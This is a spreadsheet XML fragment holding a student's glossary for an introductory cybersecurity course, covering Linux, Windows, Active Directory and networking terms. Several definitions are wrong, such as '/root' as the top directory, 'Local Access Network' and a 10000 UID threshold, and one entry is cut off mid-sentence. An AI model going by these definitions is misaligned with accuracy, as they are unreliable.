  <si>
    <t>Completes tasks on computer by issuing commands via a command line or lines of text in the terminal.</t>
  </si>
  <si>
    <t>3.1 How Sweet is Terminal</t>
  </si>
  <si>
    <t>Graphical User Interface (GUI):</t>
  </si>
  <si>
    <t>Environment of a computer or application whereby you click on graphical content in order to achieve a desitred outcome.</t>
  </si>
  <si>
    <t>Command Line Interface (CLI):</t>
  </si>
  <si>
    <t>Environment of a terminal whereby you enter commands to achieve a desired outcome.</t>
  </si>
  <si>
    <t>File Path:</t>
  </si>
  <si>
    <t>A unique location in the file system where a file is located.</t>
  </si>
  <si>
    <t>Absolute Path:</t>
  </si>
  <si>
    <t>Indicates the location of a file regardless of current location in a file system.</t>
  </si>
  <si>
    <t>Relative  Paths:</t>
  </si>
  <si>
    <t>Starts at you current location in the file system and doesn't require using the root directory ("/")</t>
  </si>
  <si>
    <t>Data Stream:</t>
  </si>
  <si>
    <t>Describes channels of data as they are processed and moved through a system.</t>
  </si>
  <si>
    <t>cat:</t>
  </si>
  <si>
    <t>Combines files and displays results.</t>
  </si>
  <si>
    <t>Parameters:</t>
  </si>
  <si>
    <t>Options that require their own arguments.</t>
  </si>
  <si>
    <t>3.2 Commanding the Command Line</t>
  </si>
  <si>
    <t>find:</t>
  </si>
  <si>
    <t>Searches for files and directories with one command.</t>
  </si>
  <si>
    <t>type f:</t>
  </si>
  <si>
    <t>An option used to find files.</t>
  </si>
  <si>
    <t>type d:</t>
  </si>
  <si>
    <t>An option used to find directories</t>
  </si>
  <si>
    <t>name:</t>
  </si>
  <si>
    <t>Additional option used to find specific file or directory names</t>
  </si>
  <si>
    <t>iname:</t>
  </si>
  <si>
    <t>Additional option used to find case insensitive files or directory names</t>
  </si>
  <si>
    <t>grep:</t>
  </si>
  <si>
    <t>Searches for a data within files.</t>
  </si>
  <si>
    <t>-i:</t>
  </si>
  <si>
    <t>Will search for datapoint and also caseinsensitive</t>
  </si>
  <si>
    <t>-il:</t>
  </si>
  <si>
    <t>Shows only files keyword is found within</t>
  </si>
  <si>
    <t>3.3 Sticking to the Script</t>
  </si>
  <si>
    <t>Shell:</t>
  </si>
  <si>
    <t>The program used to interpret and manage commands. It is the operating system CLI and provides a way to create and execute scripts.</t>
  </si>
  <si>
    <t>Shell Script:</t>
  </si>
  <si>
    <t>Text file consisting of commands that are stored and run.</t>
  </si>
  <si>
    <t>Text processing commands:</t>
  </si>
  <si>
    <t>Commands that manipulate text and simplify complex data by substituting text, filtering lines of text, and delimiting text.</t>
  </si>
  <si>
    <t>-F</t>
  </si>
  <si>
    <t>option for doing field seperation with awk.</t>
  </si>
  <si>
    <t>Delimiter:</t>
  </si>
  <si>
    <t>Parameter which seperates the data in the file.</t>
  </si>
  <si>
    <t>awk:</t>
  </si>
  <si>
    <t>Text processing useful for data extraction and reporting against streams of data of text. (seperates fields with simple code).</t>
  </si>
  <si>
    <t>sed (Stream Editor):</t>
  </si>
  <si>
    <t>Reads and edits text line-by-line from an input stream.</t>
  </si>
  <si>
    <t>Operating System (OS):</t>
  </si>
  <si>
    <t>Software that supports a computers' basic functions, such as scheduling tasks, executing applications, and controlling peripherals.</t>
  </si>
  <si>
    <t>4.1 Introduction to Linux</t>
  </si>
  <si>
    <t>FOSS:</t>
  </si>
  <si>
    <t>Free Open Source Software.(Linux)</t>
  </si>
  <si>
    <t>Distributions:</t>
  </si>
  <si>
    <t>Special-purposed variants of the operating system.</t>
  </si>
  <si>
    <t>Ubuntu:</t>
  </si>
  <si>
    <t>Distribution of Linux geared towards general-purpose users.</t>
  </si>
  <si>
    <t>Kali:</t>
  </si>
  <si>
    <t>Distribution of Linux geared towards security professionals.</t>
  </si>
  <si>
    <t>Headless Servers:</t>
  </si>
  <si>
    <t>Command-Line only machine</t>
  </si>
  <si>
    <t>CentOS:</t>
  </si>
  <si>
    <t>Upstream open source development platform which allows you to develop, test, and contribute to a continuously delivered distribution that tracks just ahead of Red Hat Enterprise Linux.</t>
  </si>
  <si>
    <t>RedHat:</t>
  </si>
  <si>
    <t>supports and powers software and technologies for automation, cloud, containers, middleware, storage, application development, microservices, virtualization, management, and more</t>
  </si>
  <si>
    <t>Debian:</t>
  </si>
  <si>
    <t>Linux-based operating system for a wide range of devices including laptops, desktops and servers.</t>
  </si>
  <si>
    <t>Fedora:</t>
  </si>
  <si>
    <t>Contains software distributed under various free and open-source licenses and aims to be on the leading edge of open-source technologies.</t>
  </si>
  <si>
    <t>SELinux:</t>
  </si>
  <si>
    <t>Security enhancement to Linux which allows users and administrators more control over access control.</t>
  </si>
  <si>
    <t>Linux Central Data Server:</t>
  </si>
  <si>
    <t>Linux system which focusses on using Fedora and CentOS.</t>
  </si>
  <si>
    <t>Linux Public  Web Server:</t>
  </si>
  <si>
    <t>Linux system which focusses on using Ubuntu and Fedora</t>
  </si>
  <si>
    <t>Linux IT Audit Station:</t>
  </si>
  <si>
    <t>Linux system which focusses on using Kali.</t>
  </si>
  <si>
    <t>Linux User Workstation:</t>
  </si>
  <si>
    <t>Linux system which focusses on using Ubuntu.</t>
  </si>
  <si>
    <t>/root</t>
  </si>
  <si>
    <t>Directory that contains every other directory.</t>
  </si>
  <si>
    <t>/home</t>
  </si>
  <si>
    <t>Contains user's private files. User's should not be able to save files elsewhere.</t>
  </si>
  <si>
    <t>/etc</t>
  </si>
  <si>
    <t xml:space="preserve">Contains User Configuration Files, defining how a machine runs and who can use it </t>
  </si>
  <si>
    <t>/bin, /sbin</t>
  </si>
  <si>
    <t>Contains main binary or program files.Bin contains user programs, sbin contains Admin programs</t>
  </si>
  <si>
    <t>/var</t>
  </si>
  <si>
    <t>Contains files that change over time.</t>
  </si>
  <si>
    <t>/tmp</t>
  </si>
  <si>
    <t>Contains files that are only needed  for a short period of time.</t>
  </si>
  <si>
    <t>!:</t>
  </si>
  <si>
    <t>Disabled Account</t>
  </si>
  <si>
    <t>*:</t>
  </si>
  <si>
    <t>Inaccessible Account (Service Account)</t>
  </si>
  <si>
    <t>Processes:</t>
  </si>
  <si>
    <t xml:space="preserve">The act of a program processing data and changeing a file system. It ultimately consumes resources. </t>
  </si>
  <si>
    <t>Memory:</t>
  </si>
  <si>
    <t xml:space="preserve">The space used by a process to save and manipulate data. </t>
  </si>
  <si>
    <t>Random Access Memory (RAM):</t>
  </si>
  <si>
    <t>Used to run the program's code. Only used when program is running.</t>
  </si>
  <si>
    <t>Disk Space:</t>
  </si>
  <si>
    <t>Saves data permanently so it is accessible after programs are aborted.</t>
  </si>
  <si>
    <t>Central Processing Unit (CPU):</t>
  </si>
  <si>
    <t>Brain of system, determining how much work a process has to do, and how difficult it is.</t>
  </si>
  <si>
    <t>Targetting Resources:</t>
  </si>
  <si>
    <t>Attackers target resources in a machine, can end in a DoS attack.</t>
  </si>
  <si>
    <t>Backdoor Process:</t>
  </si>
  <si>
    <t>Method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network or software application.</t>
  </si>
  <si>
    <t>Command: top</t>
  </si>
  <si>
    <t>Allows us to see all running process in real time. Updates ever 3 seconds.</t>
  </si>
  <si>
    <t>Command: ps</t>
  </si>
  <si>
    <t>Allows you to take a snapshot of all running processes on the system.</t>
  </si>
  <si>
    <t>Command: kill</t>
  </si>
  <si>
    <t xml:space="preserve">Kills (force quit) the process. </t>
  </si>
  <si>
    <t>Dynamic Analysis:</t>
  </si>
  <si>
    <t>Process of running a potentially malicious script and monitoring its effects.</t>
  </si>
  <si>
    <t>zombie</t>
  </si>
  <si>
    <t>Leftover bits of a process that hasn't been killed yet.</t>
  </si>
  <si>
    <t>Password Hashes:</t>
  </si>
  <si>
    <t>A cryptographic function that takes data as input and translates it to a string of different, seemingly random data.</t>
  </si>
  <si>
    <t>4.2 Commanding the Command Line</t>
  </si>
  <si>
    <t>John  The Ripper:</t>
  </si>
  <si>
    <t>Modern Password cracking software which takes a list of hashes as input, tests the hashes to match the original hashed password, and gives the output in plaintext, eg "Pass-Word".</t>
  </si>
  <si>
    <t>SuperUser Do (sudo):</t>
  </si>
  <si>
    <t>Grants a user root priviledges for one command.</t>
  </si>
  <si>
    <t>id:</t>
  </si>
  <si>
    <t>command for identifying users and groups in a system</t>
  </si>
  <si>
    <t>User ID (UID):</t>
  </si>
  <si>
    <t>Specific number associated to each user. System users &lt; 1000, Standard Users &gt; 10000</t>
  </si>
  <si>
    <t>etc/group:</t>
  </si>
  <si>
    <t>Local directory for all group information</t>
  </si>
  <si>
    <t>etc/passwd:</t>
  </si>
  <si>
    <t>Local directory for user specific information</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <u/>
      </rPr>
      <t>rw-</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>r--r--</t>
    </r>
  </si>
  <si>
    <t>Means owner Permissions</t>
  </si>
  <si>
    <t>4.3 Stick to the Script</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <u/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>rw-r--r--</t>
    </r>
  </si>
  <si>
    <t>Means Item type (- = file, d = directory)</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>-rw-</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <u/>
      </rPr>
      <t>r--</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>r--</t>
    </r>
  </si>
  <si>
    <t>Means group permission</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>-rw-r--</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <u/>
      </rPr>
      <t>r--</t>
    </r>
  </si>
  <si>
    <t>Other / World permissions</t>
  </si>
  <si>
    <t>r</t>
  </si>
  <si>
    <t>Read access</t>
  </si>
  <si>
    <t>w</t>
  </si>
  <si>
    <t>Write</t>
  </si>
  <si>
    <t>x</t>
  </si>
  <si>
    <t>Execute</t>
  </si>
  <si>
    <t xml:space="preserve">rwx
</t>
  </si>
  <si>
    <t>Read, Write, Execute</t>
  </si>
  <si>
    <t>Managing Services:</t>
  </si>
  <si>
    <t>A function or capability that a machine makes available to another.</t>
  </si>
  <si>
    <t>SMB Protocol:</t>
  </si>
  <si>
    <t>A network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network.</t>
  </si>
  <si>
    <t>Archiving Data:</t>
  </si>
  <si>
    <t>Ensure it remains available in the case of a natural disaster or cyber attack.</t>
  </si>
  <si>
    <t>5.1 Backups and Tar</t>
  </si>
  <si>
    <t>Scheduling Backups:</t>
  </si>
  <si>
    <t>To ensure data is up to date and made at the appropriate frequency.</t>
  </si>
  <si>
    <t>Monitoring Log Files:</t>
  </si>
  <si>
    <t>Prevent and detect suspicious activity and keep systems running efficiently.</t>
  </si>
  <si>
    <t>Archiving:</t>
  </si>
  <si>
    <t>Overseeing or conducting data recovery and backup.</t>
  </si>
  <si>
    <t>Sarbanes-Oxley Act (SOX):</t>
  </si>
  <si>
    <t>Common standard of data archiving. Business communication and business records to be retained for 5 years.</t>
  </si>
  <si>
    <t>Markets in Financial Instruments Directive (MiFID II):</t>
  </si>
  <si>
    <t>European regulation that increases the transparency across the European Union's financial markets and standardizes the regulatory disclosures required for firms operating in the European Union.</t>
  </si>
  <si>
    <t>Health Insurance Portability and Accountability Act (HIPAA)</t>
  </si>
  <si>
    <t>Healthcare providers to keep records for six years</t>
  </si>
  <si>
    <t>Backing Up</t>
  </si>
  <si>
    <t>Operation of quickly recovering lost assets and quickly restoring systems.</t>
  </si>
  <si>
    <t>Full Backups:</t>
  </si>
  <si>
    <t>More reliable and offer complete restoration but require large storage space.</t>
  </si>
  <si>
    <t>Incremental Backups</t>
  </si>
  <si>
    <t>Includes only data that changed since last full or incremental backup.</t>
  </si>
  <si>
    <t>Differetial Backups:</t>
  </si>
  <si>
    <t>A differential backup is a type of data backup that preserves data, saving only the difference in the data since the last full backup.</t>
  </si>
  <si>
    <t>Tape Archive (tar) Command:</t>
  </si>
  <si>
    <t>Linux Utility that system administrators use to create a backup.</t>
  </si>
  <si>
    <t>Archive:</t>
  </si>
  <si>
    <t>Special file that contains a concentration of files and directions.</t>
  </si>
  <si>
    <t>gzip Command:</t>
  </si>
  <si>
    <t>Command used to create a compressed tar archive indicated with a tar.gz extension.</t>
  </si>
  <si>
    <t>.snar</t>
  </si>
  <si>
    <t>Filename of snapshot created after an incrimental backup</t>
  </si>
  <si>
    <t>--listed-incremental=FILENAME.snar</t>
  </si>
  <si>
    <t xml:space="preserve">Notifier of a series of incrimental backups and speciifes that information about files added, changed, or removed. </t>
  </si>
  <si>
    <t xml:space="preserve">Checkpoint: </t>
  </si>
  <si>
    <t>A specific stage of a backup or restoration that can trigger designated actions.</t>
  </si>
  <si>
    <t>Automating:</t>
  </si>
  <si>
    <t>Tasks that are executed on a predefined schedule</t>
  </si>
  <si>
    <t>5.2 Cron and Scheduled Jobs</t>
  </si>
  <si>
    <t>Cron Job:</t>
  </si>
  <si>
    <t>A script designated to run at periodic, predetermined intervals.</t>
  </si>
  <si>
    <t>Cron:</t>
  </si>
  <si>
    <t>A system daemon that keeps track of when to run scheduled tasks. (Task Scheduler daemon)</t>
  </si>
  <si>
    <t>Daemon:</t>
  </si>
  <si>
    <t>Computer program that runs as a background process, rather than being directly controlled  by an interactive user.</t>
  </si>
  <si>
    <t>Cron Table (crontab):</t>
  </si>
  <si>
    <t xml:space="preserve">Files that store tasks and schedules. </t>
  </si>
  <si>
    <t>/var/log:</t>
  </si>
  <si>
    <t xml:space="preserve">Repository for all log files. </t>
  </si>
  <si>
    <t>5.3 Monitoring Log Files</t>
  </si>
  <si>
    <t>auth.log:</t>
  </si>
  <si>
    <t>Stores authentication related events, eg. Failed login attempts, detects other vulnerabilities related to user authorization mechanisms.</t>
  </si>
  <si>
    <t>cron.log:</t>
  </si>
  <si>
    <t xml:space="preserve">Stores information related to cron jobs. Shows cron related errors and success. </t>
  </si>
  <si>
    <t>Application Logs:</t>
  </si>
  <si>
    <t>Store alerts generated by software being used by the user, including when it launches, how long it was used for, and when it was closed,etc.</t>
  </si>
  <si>
    <t>Event Logs:</t>
  </si>
  <si>
    <t>Contain Information regarding security related events. Failed or successful host logins, and unauthorized installation of software, etc.</t>
  </si>
  <si>
    <t>Service Logs:</t>
  </si>
  <si>
    <t>Contains infor related to system services, such as cron and print jobs.</t>
  </si>
  <si>
    <t>System Logs:</t>
  </si>
  <si>
    <t>Contains information related to system events, eg. Boot messages, kernel errors, or anything related to the system hardware.</t>
  </si>
  <si>
    <t>journalctl:</t>
  </si>
  <si>
    <t>Command designed to filter through enormous system logs and return specific results. (grep for logs)</t>
  </si>
  <si>
    <t>systemd:</t>
  </si>
  <si>
    <t>Daemon that can be used for logging system-wide events annd providing information to other tools.</t>
  </si>
  <si>
    <t>Log Rotation</t>
  </si>
  <si>
    <t>Process of archiving a log once it reaches a specific size or a point in a set schedule, and rotating it out with a new, empty log.</t>
  </si>
  <si>
    <t>/etc/logrotate.conf</t>
  </si>
  <si>
    <t>Indicates the logs to rotate and the specific parameters to apply to those files.</t>
  </si>
  <si>
    <t>auditd:</t>
  </si>
  <si>
    <t>Shows modifications made to a system, every single change made complte with useful information.</t>
  </si>
  <si>
    <t>Kernel:</t>
  </si>
  <si>
    <t>Core component of any operating system, responsible for system memory, processes, tasks, and disk management.</t>
  </si>
  <si>
    <t>System Call:</t>
  </si>
  <si>
    <t>When any software or application makes a ruest for system resources.</t>
  </si>
  <si>
    <t>ausearch:</t>
  </si>
  <si>
    <t xml:space="preserve">Tool designed to query auditd daemon logs based on different search crteria for event driven data-log records. </t>
  </si>
  <si>
    <t>aureport:</t>
  </si>
  <si>
    <t>Program that summarizes various types of events.</t>
  </si>
  <si>
    <t>auditctl:</t>
  </si>
  <si>
    <t>Responsible for configuring the auditd system. Has the capability to enable or disable auditd systems, load and list rules, and generate status reports.</t>
  </si>
  <si>
    <t>Compound Commands:</t>
  </si>
  <si>
    <t>Several individual commands that we would originally run seperately linked together to create a new command.</t>
  </si>
  <si>
    <t>6.1  Combining Commands</t>
  </si>
  <si>
    <t>Aliases:</t>
  </si>
  <si>
    <t>Custom commands that launch compund command.</t>
  </si>
  <si>
    <t>.bashrc</t>
  </si>
  <si>
    <t>File in users home folder containing permanent aliases set (~/.bashrc)</t>
  </si>
  <si>
    <t>Bash Script:</t>
  </si>
  <si>
    <t>An executable file that contains a series of commands.</t>
  </si>
  <si>
    <t>/bin</t>
  </si>
  <si>
    <t>Directory containining all commands that can be run</t>
  </si>
  <si>
    <t>Bash Scripting:</t>
  </si>
  <si>
    <t>A vital skill for system administration, forensics, and pentesters.</t>
  </si>
  <si>
    <t>6.2 IFs and Lists</t>
  </si>
  <si>
    <t>Conditional Statements:</t>
  </si>
  <si>
    <t>IF, IF/ELSE, FOR</t>
  </si>
  <si>
    <t>Comment #:</t>
  </si>
  <si>
    <t>Script functionality in english for readability and understandability of code in a script</t>
  </si>
  <si>
    <t>Variables:</t>
  </si>
  <si>
    <t xml:space="preserve">A container used to hold a specific value. Different variables can hold different types of data. </t>
  </si>
  <si>
    <t>Common variables:</t>
  </si>
  <si>
    <t>String &amp; Integer</t>
  </si>
  <si>
    <t>For Loops:</t>
  </si>
  <si>
    <t>Allow us to run a block of code multiple times in a row, without having to repeatedly enter that code.</t>
  </si>
  <si>
    <t>Task Manager:</t>
  </si>
  <si>
    <t>Shows lists of Process, App History, Performance, Startup, Details, Users, and Services.</t>
  </si>
  <si>
    <t>7.1 Introduction to Windows</t>
  </si>
  <si>
    <t>PID:</t>
  </si>
  <si>
    <t>Process ID</t>
  </si>
  <si>
    <t>c:\:</t>
  </si>
  <si>
    <t>Root Drive containing windows</t>
  </si>
  <si>
    <t>c:\PerfLogs\:</t>
  </si>
  <si>
    <t>Log file Directory</t>
  </si>
  <si>
    <t>c:\ProgramFiles\:</t>
  </si>
  <si>
    <t>Directory containing 64-bit packages installed on system</t>
  </si>
  <si>
    <t>c:\ProgramFiles(x86)\:</t>
  </si>
  <si>
    <t>Directory containing 32-bit packages installed on system</t>
  </si>
  <si>
    <t>c:\ProgramData\:</t>
  </si>
  <si>
    <t>Where application-specific settings are saved</t>
  </si>
  <si>
    <t>c:\Windows\System32\:</t>
  </si>
  <si>
    <t>Windows Configurations and Drivers Directory</t>
  </si>
  <si>
    <t>c:\Users\:</t>
  </si>
  <si>
    <t>Lists all Users on local machine</t>
  </si>
  <si>
    <t>c:\Users\azadmin\Desktop\:</t>
  </si>
  <si>
    <t>Contains users Desktoip directory</t>
  </si>
  <si>
    <t>Environmental Variables (EnvVars):</t>
  </si>
  <si>
    <t>Special values that contain information about the system, eg user's home dir or Program Files directory.</t>
  </si>
  <si>
    <t>Windows Management Instrument Command (wmic):</t>
  </si>
  <si>
    <t>Tool used to query system information and diagnostics, such as OS and Hard Disk Info.</t>
  </si>
  <si>
    <t>net user:</t>
  </si>
  <si>
    <t>For Adding, removing and managing users.</t>
  </si>
  <si>
    <t>net localgroup:</t>
  </si>
  <si>
    <t>For adding, removing and managing local groups</t>
  </si>
  <si>
    <t>net accounts:</t>
  </si>
  <si>
    <t>For viewing password and logon requirements for users to enforce password security policies.</t>
  </si>
  <si>
    <t>net:</t>
  </si>
  <si>
    <t>Password policies specifying time before a password expires, streght of passwords, change of passwords based on day limits.</t>
  </si>
  <si>
    <t>Task Scheduler:</t>
  </si>
  <si>
    <t>GUI Tool that allows system admins to automate the execution of scripts and applications on Windows Systems.</t>
  </si>
  <si>
    <t>Powershell:</t>
  </si>
  <si>
    <t xml:space="preserve">Powerful Scripting language we can use to local and remotely manage Microsoft's line of products. </t>
  </si>
  <si>
    <t>7.2 PowerShell Scripting</t>
  </si>
  <si>
    <t>Object:</t>
  </si>
  <si>
    <t>Microsoft Name for every component</t>
  </si>
  <si>
    <t>JSON (JavaScript Object Notation):</t>
  </si>
  <si>
    <t>A lightweight, text-based, language-independent data interchange format.</t>
  </si>
  <si>
    <t>csv:</t>
  </si>
  <si>
    <t>Plain text files that contain simply structured daa fields seperated by commas</t>
  </si>
  <si>
    <t>For Loop:</t>
  </si>
  <si>
    <t>Looping through files or read only structured data that you need to loop through</t>
  </si>
  <si>
    <t>Active Directory (AD):</t>
  </si>
  <si>
    <t>The central databasing and management system for enterprise-scale Windows Environments</t>
  </si>
  <si>
    <t>7.3 Active Directory Domain Services</t>
  </si>
  <si>
    <t>Domain Controller:</t>
  </si>
  <si>
    <t>A server that manages all of the users and access to all domain-joined resources.</t>
  </si>
  <si>
    <t>Objects:</t>
  </si>
  <si>
    <t>Users Groups and Computers</t>
  </si>
  <si>
    <t>Lightweight Directory Access Protocol (LDAP):</t>
  </si>
  <si>
    <t>Standardized protocol for adding, deleting and editing objects. LDAP is the pencil and eraser of AD</t>
  </si>
  <si>
    <t>Domains:</t>
  </si>
  <si>
    <t>A Windows domain is a digital grouping of all object types, such as users, computers, network resources, and security principals, in an enterprise. These are managed by a server called a domain controller.</t>
  </si>
  <si>
    <t>Organizational unit (OU):</t>
  </si>
  <si>
    <t>OUs are virtual collections of objects like containers, that can have policies applied to them. They are organization-defined collections of objects (users, groups, computers, etc.) in AD.</t>
  </si>
  <si>
    <t>Users:</t>
  </si>
  <si>
    <t>Includes all of the information stored about a user in Active Directory.</t>
  </si>
  <si>
    <t xml:space="preserve">Groups: </t>
  </si>
  <si>
    <t>A collection of object users, computers, and other resources.</t>
  </si>
  <si>
    <t xml:space="preserve">LM hashes: </t>
  </si>
  <si>
    <t>An insecure hashing method used by the older authentication protocol, LAN Manager.</t>
  </si>
  <si>
    <t>NTLM:</t>
  </si>
  <si>
    <t>A challenge/reponse-based authentication protocol security suite developed by Microsoft as the successor to LanMan.</t>
  </si>
  <si>
    <t xml:space="preserve">Kerberos: </t>
  </si>
  <si>
    <t>A ticket-based authentication protocol that is now the default authentication protocol for Windows Server domains since Windows Server 2000.</t>
  </si>
  <si>
    <t>Key Distribution Center (KDC)</t>
  </si>
  <si>
    <t>A component in an access control system responsible for servicing user requests to access resources by supplying access tickets and session keys.</t>
  </si>
  <si>
    <t>Ticket-granting Ticket (TGT):</t>
  </si>
  <si>
    <t>Files created by the key distribution center (KDC) portion of the Kerberos authentication protocol. They are used to grant users access to network resources. TGT files can provide secure data protection once the user and server authenticate them.</t>
  </si>
  <si>
    <t>Access Control Lists (ACLs):</t>
  </si>
  <si>
    <t>These identify which entities (known as security principals), such as users and groups, can access which resources. ACLs use security identifers to manage which principals can access which resources.</t>
  </si>
  <si>
    <t>Client-Server Model:</t>
  </si>
  <si>
    <t>A network computing model that defines how resources and services are shared across a network.</t>
  </si>
  <si>
    <t>8.1 Introduction to Networking</t>
  </si>
  <si>
    <t>Network Security:</t>
  </si>
  <si>
    <t>The practise and policies used to protect and monitor a computer network's resources against threats and risks.</t>
  </si>
  <si>
    <t>Local Access Network (LAN):</t>
  </si>
  <si>
    <t>Private Computer Network that connects devices in a smaller physical area.</t>
  </si>
  <si>
    <t>Wide Access Network (WAN):</t>
  </si>
  <si>
    <t>Network used to connect multiple LANs.</t>
  </si>
  <si>
    <t>Network Topology:</t>
  </si>
  <si>
    <t>The Design or technique with which computers are set up on a network</t>
  </si>
  <si>
    <t>Ring Topology:</t>
  </si>
  <si>
    <t>Each device is connected to the next device in the chain. (Bidirectional Data goes both ways &amp; Unidirectional Data goes one way)</t>
  </si>
  <si>
    <t>Linear Topology:</t>
  </si>
  <si>
    <t>Each Device is connected to the adjacent device by a two-way link. End Nodes do not connect to each other.</t>
  </si>
  <si>
    <t>Star Topology:</t>
  </si>
  <si>
    <t>All devices on network are connected to a central node.</t>
  </si>
  <si>
    <t>Bus Topology:</t>
  </si>
  <si>
    <t>Every device is connected to a central data link. When a device transmits data, it sends it to the link, at which point every device on the network can recieve it simultaneously.</t>
  </si>
  <si>
    <t>Tree Topology:</t>
  </si>
  <si>
    <t>When many connected devices are arranged like a branch of a tree.</t>
  </si>
  <si>
    <t>Fully Connected Topology:</t>
  </si>
  <si>
    <t xml:space="preserve">Every Device is connected to each other. </t>
  </si>
  <si>
    <t>Mesh Topology:</t>
  </si>
  <si>
    <t>Same as fully connected top, however not all devices are connected, and data is transmitted via fastest connection routes.</t>
  </si>
  <si>
    <t>Hybrid Topology:</t>
  </si>
  <si>
    <t>Any combination of topologies.</t>
  </si>
  <si>
    <t>Point of Failure:</t>
  </si>
  <si>
    <t>The point in a network that posed a threat to the network.</t>
  </si>
  <si>
    <t>Router:</t>
  </si>
  <si>
    <t>Networking device that forwards (routes) resources to other networks.</t>
  </si>
  <si>
    <t>Switch:</t>
  </si>
  <si>
    <t>Network device that forwards resources within a network.</t>
  </si>
  <si>
    <t>Hub:</t>
  </si>
  <si>
    <t>Not an intelligent switch and cannot be programmed.</t>
  </si>
  <si>
    <t>Bridge:</t>
  </si>
  <si>
    <t xml:space="preserve">Switch but only offers 2 connections, in and out. </t>
  </si>
  <si>
    <t>Network Interface Controller (NIC):</t>
  </si>
  <si>
    <t>Computer hardware that connects a computer to a computer network.</t>
  </si>
  <si>
    <t>Modem:</t>
  </si>
  <si>
    <t>Converts data into a format that the next type of connection can understand</t>
  </si>
  <si>
    <t>All-in-One Device:</t>
  </si>
  <si>
    <t>Modem,WAPs, Routers, and more all built into one unit.</t>
  </si>
  <si>
    <t>Firewall:</t>
  </si>
  <si>
    <t xml:space="preserve">Intelligent network security device that monitors incoming and outgoing traffic on security rules. </t>
  </si>
  <si>
    <t>Load Balancer:</t>
  </si>
  <si>
    <t>An intelligent network security device that distributes the incoming network traffic across multiple servers.</t>
  </si>
  <si>
    <t>Demilitarized Zone (DMZ):</t>
  </si>
  <si>
    <t>Smaller subnetwork within a LAN used to add layer of security to an organization's LAN, protecting secure dat</t>
  </si>
  <si>
    <t>Network Visualisation:</t>
  </si>
  <si>
    <t>Designing your network visually can assist with reducing latency, avoiding point of failures, and protecting resources from unauthorized parties.</t>
  </si>
  <si>
    <t>Gliffy:</t>
  </si>
  <si>
    <t>Visually design a network tool.</t>
  </si>
  <si>
    <t>Binary to ASCII</t>
  </si>
  <si>
    <t>Conersion of Binary into readable text.</t>
  </si>
  <si>
    <t>Binary to Hexadecimal:</t>
  </si>
  <si>
    <t>Shortens binary to letters and numbers</t>
  </si>
  <si>
    <t>Binary to octal:</t>
  </si>
  <si>
    <t>shorten binary to numbers</t>
  </si>
  <si>
    <t>IP Address:</t>
  </si>
  <si>
    <t>a logical address that allows you to communicate over the Internet.</t>
  </si>
  <si>
    <t>IPv4:</t>
  </si>
  <si>
    <t>IP Addresses made up of four octets, seperated by decimals. These are converted from eight binary bits or one byte to standard decimal numbers.</t>
  </si>
  <si>
    <t>IPv6:</t>
  </si>
  <si>
    <t>IP address divided into eight groups of two bytes. However, these bytes are not binary or decimal.</t>
  </si>
  <si>
    <t>Public IPs:</t>
  </si>
  <si>
    <t>Are addresses that can be accessed over the internet.</t>
  </si>
  <si>
    <t>Private IPs</t>
  </si>
  <si>
    <t>Addresses not exposed on the internet, only available via LAN.</t>
  </si>
  <si>
    <t>Subnetting:</t>
  </si>
  <si>
    <t>When organisations group their devices together on a network for organisational and efficiency reasons.</t>
  </si>
  <si>
    <t>CIDRs:</t>
  </si>
  <si>
    <t xml:space="preserve">Consists of Prefix and Suffix. Prefix is the first three octets and the suffix is the </t>
  </si>
  <si>
    <t>Mac Address:</t>
  </si>
  <si>
    <t>Physical 12-character alphanumeric attribute that is used to identify individual electronic devices on a network.</t>
  </si>
  <si>
    <t>Domain Name System (DNS):</t>
  </si>
  <si>
    <t>Allows us to navigate to a website without entering the ipaddress.</t>
  </si>
  <si>
    <t>DNS Lookup:</t>
  </si>
  <si>
    <t>Search for a series of caches to find the IP addresses associated to the webpage we type.</t>
  </si>
  <si>
    <t>URLs:</t>
  </si>
  <si>
    <t xml:space="preserve">The unique accessible link to a resource on a website </t>
  </si>
  <si>
    <t>DNS Highjacking:</t>
  </si>
  <si>
    <t>Exploits DNS vulnerabilities to divert web traffic away from legitimate servers and towards fake or malicious servers.</t>
  </si>
  <si>
    <t>Protocol:</t>
  </si>
  <si>
    <t>Strict rules that impose structure by specifying the precise meaning of keywords, and where in a message they must appear.</t>
  </si>
  <si>
    <t xml:space="preserve">8.2 Ports, Protocols, and the OSI Model
</t>
  </si>
  <si>
    <t>Hypertext Transfer Protocol (HTTP)</t>
  </si>
  <si>
    <t>Used to communicate web traffic</t>
  </si>
  <si>
    <t>File transfer Protocol (FTP)</t>
  </si>
  <si>
    <t>Used to transfer files</t>
  </si>
  <si>
    <t>Password Authentication Protocol (PAP)</t>
  </si>
  <si>
    <t>Used for authenticating a user.</t>
  </si>
  <si>
    <t>Server Message Block (SMB)</t>
  </si>
  <si>
    <t>Windows-based protocol used for sharing files.</t>
  </si>
  <si>
    <t>Network Basic Input/Output System (NetBIOS)</t>
  </si>
  <si>
    <t>Allows computers to communicate on a local network</t>
  </si>
  <si>
    <t>Network Packet:</t>
  </si>
  <si>
    <t>A mesage adhering to protocol rules.</t>
  </si>
  <si>
    <t>Packet:</t>
  </si>
  <si>
    <t>The binary data grouped together into seperate pieces.</t>
  </si>
  <si>
    <t>Header:</t>
  </si>
  <si>
